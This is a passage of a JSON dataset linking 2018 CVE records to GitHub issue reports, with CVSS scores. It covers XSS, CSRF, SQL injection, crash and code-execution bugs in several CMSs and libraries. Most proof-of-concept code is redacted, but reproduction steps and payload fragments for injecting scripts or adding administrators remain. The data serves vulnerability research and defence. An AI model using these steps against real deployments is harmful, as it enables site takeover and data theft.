GC_REFCOUNT(ref NUMBERTAG zval_dtor_func(ref ZEND_FILE_LINE_RELAY_CC NUMBERTAG else NUMBERTAG gc_check_possible_root(ref NUMBERTAG I am not sure, but I believe that with this issue a APITAG on an arbitrary address(using _val_dtor_func) can be done, so maybe this can be a vulnerability (but as I said, I am not sure). Test script: APITAG unpack($sor); echo \"[+] Swoole Unserialized: \"; var_dump($ser); //var_dump($obj >unpack($test)); APITAG NUMBERTAG",
  23643. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23644. "severity": "HIGH",
  23645. "baseScore": 7.5,
  23646. "impactScore": 3.6,
  23647. "exploitabilityScore": 3.9
  23648. },
  23649. {
  23650. "CVE_ID": "CVE-2018-15504",
  23651. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/264",
  23652. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/264",
  23653. "Repo_new": "embedthis/goahead",
  23654. "Issue_Created_At": "2018-02-06T02:09:15Z",
  23655. "description": "NULL dereference for invalid Host and If Modified headers. Overview A security vulnerability affecting APITAG versions NUMBERTAG up to and including NUMBERTAG with specially crafted if modified or host headers has been identified. This bulletin discusses this flaw and its implications. Summary An HTTP POST request with specially crafted, invalid if modified and/or Host header fields may cause a NULL dereference and thus a denial of service. Description If the \"host\" field of an HTTP request does not contain a closing IP NUMBERTAG character a NULL dereference will occur. If the \"if modified since\" or \"if unmodified since\" headers contain an invalid time such that the month decodes to be greater than NUMBERTAG a NULL dereference will occur. Threat Scope Versions up to and including NUMBERTAG Fixed in NUMBERTAG Severity Medium. An attacker could cause a denial of service. Remedy Apply the quick patch below to APITAG NUMBERTAG to NUMBERTAG Alternatively, upgrade to APITAG NUMBERTAG Quick Patch In socket.c: CODETAG In time.c: CODETAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  23656. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23657. "severity": "HIGH",
  23658. "baseScore": 7.5,
  23659. "impactScore": 3.6,
  23660. "exploitabilityScore": 3.9
  23661. },
  23662. {
  23663. "CVE_ID": "CVE-2018-15504",
  23664. "Issue_Url_old": "https://github.com/embedthis/appweb/issues/605",
  23665. "Issue_Url_new": "https://github.com/embedthis/appweb/issues/605",
  23666. "Repo_new": "embedthis/appweb",
  23667. "Issue_Created_At": "2018-02-06T02:00:26Z",
  23668. "description": "NULL dereference for invalid Host and If Modified headers. Overview A security vulnerability affecting Appweb versions up to and including NUMBERTAG with specially crafted if modified or host headers has been identified. This bulletin discusses this flaw and its implications. Summary An HTTP POST request with specially crafted, invalid if modified and/or Host header fields may cause a NULL dereference and thus a denial of service. Description If the \"host\" field of an HTTP request does not contain a closing IP NUMBERTAG character a NULL dereference will occur. If the \"if modified since\" or \"if unmodified since\" headers contain an invalid time such that the month decodes to be greater than NUMBERTAG a NULL dereference will occur. Threat Scope Versions up to and including NUMBERTAG Fixed in NUMBERTAG Severity Medium. An attacker could cause a denial of service. Remedy Apply the quick patch below to Appweb NUMBERTAG to NUMBERTAG Alternatively, upgrade to Appweb NUMBERTAG when it is released. APITAG NUMBERTAG is highly compatible with Appweb NUMBERTAG and upgrading should be straightforward. Quick Patch CODETAG Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  23669. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23670. "severity": "HIGH",
  23671. "baseScore": 7.5,
  23672. "impactScore": 3.6,
  23673. "exploitabilityScore": 3.9
  23674. },
  23675. {
  23676. "CVE_ID": "CVE-2018-15560",
  23677. "Issue_Url_old": "https://github.com/Legrandin/pycryptodome/issues/198",
  23678. "Issue_Url_new": "https://github.com/legrandin/pycryptodome/issues/198",
  23679. "Repo_new": "legrandin/pycryptodome",
  23680. "Issue_Created_At": "2018-08-17T15:03:22Z",
  23681. "description": "Integer overflow vulnerability in pycryptodome module. APITAG pycryptodome module in python APITAG the following poc python poc.py APITAG NUMBERTAG python will APITAG fault) APITAG vulnerability analysis reference: FILETAG",
  23682. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23683. "severity": "HIGH",
  23684. "baseScore": 7.5,
  23685. "impactScore": 3.6,
  23686. "exploitabilityScore": 3.9
  23687. },
  23688. {
  23689. "CVE_ID": "CVE-2018-15564",
  23690. "Issue_Url_old": "https://github.com/daveismyname/simple-cms/issues/4",
  23691. "Issue_Url_new": "https://github.com/dcblogdev/simple-cms/issues/4",
  23692. "Repo_new": "dcblogdev/simple-cms",
  23693. "Issue_Created_At": "2018-08-08T04:05:46Z",
  23694. "description": "simple cms has Cross site request forgery. URLTAG I can delete any page when I send the url to administrator. I can also use the Short APITAG to encode the url. FILETAG",
  23695. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23696. "severity": "HIGH",
  23697. "baseScore": 8.8,
  23698. "impactScore": 5.9,
  23699. "exploitabilityScore": 2.8
  23700. },
  23701. {
  23702. "CVE_ID": "CVE-2018-15565",
  23703. "Issue_Url_old": "https://github.com/daveismyname/simple-cms/issues/3",
  23704. "Issue_Url_new": "https://github.com/dcblogdev/simple-cms/issues/3",
  23705. "Repo_new": "dcblogdev/simple-cms",
  23706. "Issue_Created_At": "2018-08-08T03:57:57Z",
  23707. "description": "simple cms has Cross site request forgery. URLTAG I can add a page when the admin opens the HTML file. payload: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  23708. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23709. "severity": "HIGH",
  23710. "baseScore": 8.8,
  23711. "impactScore": 5.9,
  23712. "exploitabilityScore": 2.8
  23713. },
  23714. {
  23715. "CVE_ID": "CVE-2018-15565",
  23716. "Issue_Url_old": "https://github.com/daveismyname/simple-cms/issues/2",
  23717. "Issue_Url_new": "https://github.com/dcblogdev/simple-cms/issues/2",
  23718. "Repo_new": "dcblogdev/simple-cms",
  23719. "Issue_Created_At": "2018-08-08T03:50:41Z",
  23720. "description": "simple cms has Unauthorized Access. FILETAG This URL is used to log in as admin. But I can access FILETAG without logging in as admin, and I can also add a page. FILETAG FILETAG",
  23721. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23722. "severity": "HIGH",
  23723. "baseScore": 8.8,
  23724. "impactScore": 5.9,
  23725. "exploitabilityScore": 2.8
  23726. },
  23727. {
  23728. "CVE_ID": "CVE-2018-15566",
  23729. "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/2",
  23730. "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/2",
  23731. "Repo_new": "fmsdwifull/tp5cms",
  23732. "Issue_Created_At": "2018-08-10T07:19:56Z",
  23733. "description": "tp5cms NUMBERTAG has XSS vulnerability in input FILETAG",
  23734. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23735. "severity": "MEDIUM",
  23736. "baseScore": 6.1,
  23737. "impactScore": 2.7,
  23738. "exploitabilityScore": 2.8
  23739. },
  23740. {
  23741. "CVE_ID": "CVE-2018-15568",
  23742. "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/3",
  23743. "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/3",
  23744. "Repo_new": "fmsdwifull/tp5cms",
  23745. "Issue_Created_At": "2018-08-10T10:05:11Z",
  23746. "description": "tp5cms NUMBERTAG has Cross site request forgery. I can delete a category via catid when the admin opens the CSRF HTML file. CSRF HTML: CODETAG FILETAG",
  23747. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23748. "severity": "HIGH",
  23749. "baseScore": 8.8,
  23750. "impactScore": 5.9,
  23751. "exploitabilityScore": 2.8
  23752. },
  23753. {
  23754. "CVE_ID": "CVE-2018-15570",
  23755. "Issue_Url_old": "https://github.com/caokang/waimai/issues/4",
  23756. "Issue_Url_new": "https://github.com/caokang/waimai/issues/4",
  23757. "Repo_new": "caokang/waimai",
  23758. "Issue_Created_At": "2018-08-07T01:50:56Z",
  23759. "description": "There is a stored XSS in the goods information. After logging in as admin, there is a stored XSS in the goods information. The attacked URL: URLTAG The fcname field is the injected parameter. POST data: NUMBERTAG Content Disposition: form data; name=\"fcname\" \u00e7\u00be\u008e\u00e5\u0091\u00b3\u00e6\u00b1\u0089\u00e5\u00a0 APITAG APITAG NUMBERTAG Content Disposition: form data; name=\"fcid NUMBERTAG Content Disposition: form data; name=\"fcsort NUMBERTAG APITAG APITAG",
  23760. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  23761. "severity": "MEDIUM",
  23762. "baseScore": 4.8,
  23763. "impactScore": 2.7,
  23764. "exploitabilityScore": 1.7
  23765. },
  23766. {
  23767. "CVE_ID": "CVE-2018-15603",
  23768. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/2",
  23769. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/2",
  23770. "Repo_new": "victoralagwu/cmssite",
  23771. "Issue_Created_At": "2018-08-20T07:50:29Z",
  23772. "description": "There is a stored XSS vulnerability that can execute JavaScript. No login is required: just open an article and comment on it. For example\uff0cthis article\uff1a FILETAG Add comments here > FILETAG When I click Submit\uff0cit will pop up XSS > FILETAG Here is the page source code > FILETAG",
  23773. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23774. "severity": "MEDIUM",
  23775. "baseScore": 6.1,
  23776. "impactScore": 2.7,
  23777. "exploitabilityScore": 2.8
  23778. },
  23779. {
  23780. "CVE_ID": "CVE-2018-15607",
  23781. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1255",
  23782. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1255",
  23783. "Repo_new": "imagemagick/imagemagick",
  23784. "Issue_Created_At": "2018-08-21T06:29:23Z",
  23785. "description": "APITAG NUMBERTAG A hang in convert. Prerequisites [\u221a ] I have written a descriptive issue title [ \u221a] I have verified that I am using the latest version of APITAG [ \u221a] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG I use the fuzz tool test the newest version of APITAG I found a crash that will cause the program hang(more than ten minutes),and the CPU and memory will be APITAG that the poc only have NUMBERTAG bytes. Steps to Reproduce APITAG Inter(R) Core(TM) i NUMBERTAG CPU NUMBERTAG GHz NUMBERTAG G RAM NUMBERTAG G Disk APITAG version NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Linu NUMBERTAG generic APITAG Ubuntu SMP Thu Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: looking forward to hearing from you soon:) APITAG",
  23786. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23787. "severity": "MEDIUM",
  23788. "baseScore": 6.5,
  23789. "impactScore": 3.6,
  23790. "exploitabilityScore": 2.8
  23791. },
  23792. {
  23793. "CVE_ID": "CVE-2018-15747",
  23794. "Issue_Url_old": "https://github.com/prasmussen/glot-code-runner/issues/15",
  23795. "Issue_Url_new": "https://github.com/prasmussen/glot-code-runner/issues/15",
  23796. "Repo_new": "prasmussen/glot-code-runner",
  23797. "Issue_Created_At": "2018-08-23T09:11:20Z",
  23798. "description": "Arbitrary code execution. This program doesn't restrict which commands are executed, so we can run arbitrary commands on this runner. payload: CODETAG output: ERRORTAG If this program runs on a website, it will result in remote command execution. For example FILETAG",
  23799. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23800. "severity": "CRITICAL",
  23801. "baseScore": 9.8,
  23802. "impactScore": 5.9,
  23803. "exploitabilityScore": 3.9
  23804. },
  23805. {
  23806. "CVE_ID": "CVE-2018-15834",
  23807. "Issue_Url_old": "https://github.com/radare/radare2/issues/11274",
  23808. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/11274",
  23809. "Repo_new": "radareorg/radare2",
  23810. "Issue_Created_At": "2018-08-27T11:44:47Z",
  23811. "description": "memory corruption in flirt signature loading. memory corruption in flirt signature loading Work environment | Questions | Answers | | | PATHTAG (mandatory) | gentoo NUMBERTAG File format of the file you reverse (mandatory) | N/A. | Architecture/bits of the file (mandatory) | N/A. | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG ge2df NUMBERTAG a8 commit: APITAG build NUMBERTAG Expected behavior Flirt database loading Actual behavior memory corruption Steps to reproduce the behavior APITAG Additional Logs, screenshots, source code, configuration dump, ... FILETAG",
  23812. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23813. "severity": "MEDIUM",
  23814. "baseScore": 5.5,
  23815. "impactScore": 3.6,
  23816. "exploitabilityScore": 1.8
  23817. },
  23818. {
  23819. "CVE_ID": "CVE-2018-15842",
  23820. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/679",
  23821. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/679",
  23822. "Repo_new": "wolfcms/wolfcms",
  23823. "Issue_Created_At": "2018-08-08T18:25:15Z",
  23824. "description": "Cross Site Scripting (XSS) Vulnerability in wolfcms NUMBERTAG Submitted by: Author: Ritesh kumar Email: EMAILTAG APITAG URLTAG Proof of Concept Hello, I would like to report a vulnerability that I discovered in wolfcms NUMBERTAG which can be exploited to perform Cross Site Scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization in the \"slug\" parameter. The exploitation example below uses the APITAG APITAG function to display NUMBERTAG as alert text. Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Vulnerability Type: Cross Site Scripting (XSS) Vendor of Product: wolfcms Affected Product Code Base: wolfcms ( URLTAG version NUMBERTAG Affected Component: URLTAG Vulnerable parameter: SLUG Attack Type: Remote Attack Vectors: Steps to reproduce the vulnerability: APITAG to wolfcms as admin user. APITAG the URL \" URLTAG \". 
APITAG on metadata button NUMBERTAG enter the malicious java script \u201c> APITAG alert NUMBERTAG APITAG into slug parameter NUMBERTAG click on save and close button, xss will be get executed and NUMBERTAG will be reflected on the browser. Additional information Wolf CMS version: DB type and version: HTTP server type and version: Please find the screenshots below NUMBERTAG Enter the malicious java script into the slug parameter. FILETAG NUMBERTAG click on save and close button. FILETAG NUMBERTAG After clicking on save and close button, the malicious java script payload will get executed and it will displayed on the browser. FILETAG Reference: URLTAG Author: RITESH KUMAR Additional information: Wolf CMS version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG",
  23825. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  23826. "severity": "MEDIUM",
  23827. "baseScore": 4.8,
  23828. "impactScore": 2.7,
  23829. "exploitabilityScore": 1.7
  23830. },
  23831. {
  23832. "CVE_ID": "CVE-2018-15843",
  23833. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1293",
  23834. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1293",
  23835. "Repo_new": "getsimplecms/getsimplecms",
  23836. "Issue_Created_At": "2018-08-11T13:37:18Z",
  23837. "description": "Cross Site Scripting Vulnerability in APITAG CMS NUMBERTAG ulnerability name Cross APITAG Scripting. Severity: High Submitted By: Ritesh Kumar Email: EMAILTAG Vendor of Product: APITAG CMS Version NUMBERTAG Attack type: remote Description: Hello, I would like to report a vulnerability that I discovered in APITAG CMS NUMBERTAG which can be exploited to perform Cross Site Scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization in the APITAG New Page\" parameter. The exploitation example below uses the APITAG APITAG function to display \"XSS\" as alert text. Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. STEPS TO REPRODUCE: APITAG to APITAG CMS APITAG the URL \" FILETAG \". APITAG on Create New Page button then it will be redirected to FILETAG NUMBERTAG enter the malicious java script \u201c> APITAG into Add New Page parameter and add some text in body part then save the page. APITAG view that page by clicking on view button, xss will be get executed and XSS will be reflected on the browser. 
PROOF OF CONCEPT NUMBERTAG Enter the malicious java script \u201c> APITAG into Add New Page and add some text in body part then click on save button. FILETAG NUMBERTAG click on view and view that page. FILETAG NUMBERTAG After clicking on VIEW button our XSS payload will bet get executed. FILETAG",
  23838. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  23839. "severity": "MEDIUM",
  23840. "baseScore": 4.8,
  23841. "impactScore": 2.7,
  23842. "exploitabilityScore": 1.7
  23843. },
  23844. {
  23845. "CVE_ID": "CVE-2018-15844",
  23846. "Issue_Url_old": "https://github.com/Vict00r/poc/issues/1",
  23847. "Issue_Url_new": "https://github.com/vict00r/poc/issues/1",
  23848. "Repo_new": "Vict00r/poc",
  23849. "Issue_Created_At": "2018-08-21T15:29:50Z",
  23850. "description": "APITAG NUMBERTAG allows CSRF to change the administrator account's password. APITAG NUMBERTAG allows CSRF to change the administrator account's password. While the administrator is logged in, opening the PoC page changes the administrator account's password to NUMBERTAG POC\uff1a CODETAG",
  23851. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23852. "severity": "HIGH",
  23853. "baseScore": 8.8,
  23854. "impactScore": 5.9,
  23855. "exploitabilityScore": 2.8
  23856. },
  23857. {
  23858. "CVE_ID": "CVE-2018-15845",
  23859. "Issue_Url_old": "https://github.com/gleez/cms/issues/800",
  23860. "Issue_Url_new": "https://github.com/gleez/cms/issues/800",
  23861. "Repo_new": "gleez/cms",
  23862. "Issue_Created_At": "2018-08-10T10:14:29Z",
  23863. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page to add an administrator. poc\uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  23864. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23865. "severity": "HIGH",
  23866. "baseScore": 8.8,
  23867. "impactScore": 5.9,
  23868. "exploitabilityScore": 2.8
  23869. },
  23870. {
  23871. "CVE_ID": "CVE-2018-15847",
  23872. "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/12",
  23873. "Issue_Url_new": "https://github.com/choregus/puppycms/issues/12",
  23874. "Repo_new": "choregus/puppycms",
  23875. "Issue_Created_At": "2018-08-07T05:01:23Z",
  23876. "description": "There is an XSS vulnerability that can execute JavaScript. There are NUMBERTAG XSS vulnerabilities loading FILETAG: sign in and select \"SETTINGS\", insert the payload \"' APITAG alert NUMBERTAG APITAG \" in the add page /URL/ URL / link text and submit, then open FILETAG (line NUMBERTAG): ERRORTAG",
  23877. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23878. "severity": "MEDIUM",
  23879. "baseScore": 6.1,
  23880. "impactScore": 2.7,
  23881. "exploitabilityScore": 2.8
  23882. },
  23883. {
  23884. "CVE_ID": "CVE-2018-15848",
  23885. "Issue_Url_old": "https://github.com/Westbrookadmin/portfolioCMS/issues/1",
  23886. "Issue_Url_new": "https://github.com/westbrookadmin/portfoliocms/issues/1",
  23887. "Repo_new": "westbrookadmin/portfoliocms",
  23888. "Issue_Created_At": "2018-08-16T05:39:28Z",
  23889. "description": "There are two CSRF vulnerabilities that can create new pages or update the website settings. APITAG is a CSRF vulnerability that can create new pages via APITAG poc: APITAG create a new page ERRORTAG APITAG is a CSRF vulnerability that can update the website settings via FILETAG . poc: APITAG update the website settings CODETAG",
  23890. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23891. "severity": "HIGH",
  23892. "baseScore": 8.8,
  23893. "impactScore": 5.9,
  23894. "exploitabilityScore": 2.8
  23895. },
  23896. {
  23897. "CVE_ID": "CVE-2018-15850",
  23898. "Issue_Url_old": "https://github.com/redaxo/redaxo4/issues/420",
  23899. "Issue_Url_new": "https://github.com/redaxo/redaxo4/issues/420",
  23900. "Repo_new": "redaxo/redaxo4",
  23901. "Issue_Created_At": "2018-08-11T03:39:03Z",
  23902. "description": "There is a CSRF vulnerability that can add an administrator. While the administrator is logged in, a crafted page can add an administrator via PATHTAG poc FILETAG ERRORTAG",
  23903. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23904. "severity": "HIGH",
  23905. "baseScore": 8.8,
  23906. "impactScore": 5.9,
  23907. "exploitabilityScore": 2.8
  23908. },
  23909. {
  23910. "CVE_ID": "CVE-2018-15851",
  23911. "Issue_Url_old": "https://github.com/flexocms/flexo1.source/issues/25",
  23912. "Issue_Url_new": "https://github.com/flexocms/flexo1.source/issues/25",
  23913. "Repo_new": "flexocms/flexo1.source",
  23914. "Issue_Created_At": "2018-08-10T11:48:49Z",
  23915. "description": "There is a CSRF vulnerability that can add an administrator. While the administrator is logged in, a crafted page can add an administrator via PATHTAG poc FILETAG CODETAG",
  23916. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23917. "severity": "HIGH",
  23918. "baseScore": 8.8,
  23919. "impactScore": 5.9,
  23920. "exploitabilityScore": 2.8
  23921. },
  23922. {
  23923. "CVE_ID": "CVE-2018-15869",
  23924. "Issue_Url_old": "https://github.com/hashicorp/packer/issues/6584",
  23925. "Issue_Url_new": "https://github.com/hashicorp/packer/issues/6584",
  23926. "Repo_new": "hashicorp/packer",
  23927. "Issue_Created_At": "2018-08-13T22:41:00Z",
  23928. "description": "Make \"owners\" field of source_ami_filter required: RFC. APITAG security team pointed out an interesting potential exploit where if you request an amazon AMI via a source_ami_filter, but don't have \"owner\" selected, you can accidentally use a malicious base image instead of one from your own organization or a trusted vendor (without an owner constraint the filter matches on attacker-influenceable metadata such as the AMI name, so a public AMI published by anyone can satisfy it; the owner account ID is what ties the match to a trusted publisher). The impact of making the \"owner\" field required would be low for the users (I strongly suspect that a majority of people using the filter already define the owner field) but could save users from making a potentially dangerous mistake. I think we should have Packer fail during validation with an error that says this field must be designated; if we decide that there is a valid use case where people may not want to have to set this field, we could potentially allow an opt out like setting \"owner\" to \"any\" but honestly I can't think of a situation where this really makes a great deal of sense. I'm going to slate this for NUMBERTAG but I'd like to hear community thoughts.",
  23929. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  23930. "severity": "MEDIUM",
  23931. "baseScore": 5.3,
  23932. "impactScore": 1.4,
  23933. "exploitabilityScore": 3.9
  23934. },
  23935. {
  23936. "CVE_ID": "CVE-2018-15870",
  23937. "Issue_Url_old": "https://github.com/libming/libming/issues/122",
  23938. "Issue_Url_new": "https://github.com/libming/libming/issues/122",
  23939. "Repo_new": "libming/libming",
  23940. "Issue_Created_At": "2018-03-09T06:36:38Z",
  23941. "description": "Invalid memory address dereference in function APITAG and APITAG (in APITAG Hi, I found an issue in libming NUMBERTAG it crashes by function APITAG to APITAG It causes an invalid memory address dereference on a malformed input file; the ASAN report below is the only evidence given, so impact beyond a crash (denial of service) is not established. The details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  23942. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23943. "severity": "MEDIUM",
  23944. "baseScore": 6.5,
  23945. "impactScore": 3.6,
  23946. "exploitabilityScore": 2.8
  23947. },
  23948. {
  23949. "CVE_ID": "CVE-2018-15871",
  23950. "Issue_Url_old": "https://github.com/libming/libming/issues/123",
  23951. "Issue_Url_new": "https://github.com/libming/libming/issues/123",
  23952. "Repo_new": "libming/libming",
  23953. "Issue_Created_At": "2018-03-09T06:38:19Z",
  23954. "description": "Invalid memory address dereference in APITAG and APITAG (in APITAG Hi, I found an issue in libming NUMBERTAG It's similar to URLTAG but it crashes by function APITAG to APITAG . It causes an invalid memory address dereference on a malformed input file; the ASAN report below is the only evidence given, so impact beyond a crash (denial of service) is not established. The details are below (ASAN): ERRORTAG POC FILE: URLTAG",
  23955. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23956. "severity": "MEDIUM",
  23957. "baseScore": 6.5,
  23958. "impactScore": 3.6,
  23959. "exploitabilityScore": 2.8
  23960. },
  23961. {
  23962. "CVE_ID": "CVE-2018-15886",
  23963. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/455",
  23964. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/455",
  23965. "Repo_new": "monstra-cms/monstra",
  23966. "Issue_Created_At": "2018-08-27T13:48:24Z",
  23967. "description": "PHP code execution in the snippets module. Hello sir, I have found a PHP code execution vulnerability in Monstra APITAG I was able to execute PHP commands. (Per this record's CVSS vector, PR:H, the snippets page requires an authenticated high-privilege user.) Visit: URLTAG In this page\uff0cinput <?php APITAG example: APITAG then visit\uff1a FILETAG APITAG",
  23968. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  23969. "severity": "HIGH",
  23970. "baseScore": 7.2,
  23971. "impactScore": 5.9,
  23972. "exploitabilityScore": 1.2
  23973. },
  23974. {
  23975. "CVE_ID": "CVE-2018-15890",
  23976. "Issue_Url_old": "https://github.com/ethereum/ethereumj/issues/1161",
  23977. "Issue_Url_new": "https://github.com/ethereum/ethereumj/issues/1161",
  23978. "Repo_new": "ethereum/ethereumj",
  23979. "Issue_Created_At": "2018-08-20T14:48:16Z",
  23980. "description": "Unsafe Java object serialization. What's wrong: the Ethash class uses pure Java object serialization to store the light and full datasets. As MENTIONTAG pointed out, deserializing data with plain Java serialization can be exploited if an attacker can supply or tamper with the serialized bytes; additional information can be found here URLTAG . However, in this particular case it does not look valuable to an attacker. How to fix: the easiest way looks to be custom serialization (a format that does not reconstruct arbitrary classes from the stored bytes).",
  23981. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23982. "severity": "CRITICAL",
  23983. "baseScore": 9.8,
  23984. "impactScore": 5.9,
  23985. "exploitabilityScore": 3.9
  23986. },
  23987. {
  23988. "CVE_ID": "CVE-2018-15893",
  23989. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/149",
  23990. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/149",
  23991. "Repo_new": "wuzhicms/wuzhicms",
  23992. "Issue_Created_At": "2018-08-06T04:43:10Z",
  23993. "description": "wuzhicms NUMBERTAG SQL injection vulnerability. > A SQL injection was discovered in WUZHI CMS NUMBERTAG APITAG is a SQL injection vulnerability which allows remote attackers to inject a malicious SQL statement into the server via the APITAG filename APITAG code ERRORTAG POC APITAG APITAG",
  23994. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23995. "severity": "CRITICAL",
  23996. "baseScore": 9.8,
  23997. "impactScore": 5.9,
  23998. "exploitabilityScore": 3.9
  23999. },
  24000. {
  24001. "CVE_ID": "CVE-2018-15894",
  24002. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/150",
  24003. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/150",
  24004. "Repo_new": "wuzhicms/wuzhicms",
  24005. "Issue_Created_At": "2018-08-07T14:00:48Z",
  24006. "description": "wuzhicms NUMBERTAG PATHTAG SQL injection vulnerability. > A SQL injection was discovered in WUZHI CMS NUMBERTAG APITAG is a SQL injection vulnerability which allows remote attackers to inject a malicious SQL statement into the server via the APITAG filename APITAG poc CODETAG CODETAG APITAG",
  24007. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  24008. "severity": "CRITICAL",
  24009. "baseScore": 9.8,
  24010. "impactScore": 5.9,
  24011. "exploitabilityScore": 3.9
  24012. },
  24013. {
  24014. "CVE_ID": "CVE-2018-15895",
  24015. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/40",
  24016. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/40",
  24017. "Repo_new": "idreamsoft/iCMS",
  24018. "Issue_Created_At": "2018-08-18T19:06:28Z",
